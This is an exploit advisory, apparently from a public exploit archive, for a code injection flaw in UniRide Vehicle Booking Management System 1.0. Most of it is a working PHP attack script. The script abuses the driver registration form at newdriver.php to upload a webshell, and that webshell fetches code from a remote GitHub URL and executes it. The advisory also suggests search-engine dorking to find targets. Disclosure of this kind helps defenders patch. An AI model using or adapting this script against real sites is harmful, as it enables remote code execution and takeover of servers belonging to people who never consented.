=============================================================================================================================================
| # Title     : UniRide Vehicle Booking Management System 1.0 Code Injection Vulnerability                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-management-zip.zip               |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow Remotely upload and run malicious file .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php target.dz

[+] PayLoad :

<?php

function file_upload($target_ip) {
    $file_name = "indoushka.php";
    $webshell_payload = "<?php
        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
        \$ch = curl_init();
        curl_setopt(\$ch, CURLOPT_URL, \$url);
        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
        \$output = curl_exec(\$ch);
        curl_close(\$ch);
        if (\$output) {
            include 'data://text/plain;base64,' . base64_encode(\$output);
        }
    ?>";

    $post_fields = array(
        
        'submit' => '',
        'drname' => 'indoushka',
        'drjoin' => '16/12/1986',
        'drmobile' => '0771818860',
        'drnid' => '336699',
        'drlicense' => '2009-2024',
        'drlicensevalid' => 'yes',
        'draddress' => 'yes',
		'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
		
        'qty' => '1'
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$target_ip/newdriver.php");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $response = curl_exec($ch);
    curl_close($ch);

    echo "(+) Shell uploaded successfully.\n";
    echo "(+) Access the shell at: $target_ip/picture/\n";
}

if ($argc != 2) {
    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
    exit(-1);
}

$target_ip = $argv[1];
file_upload($target_ip);




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================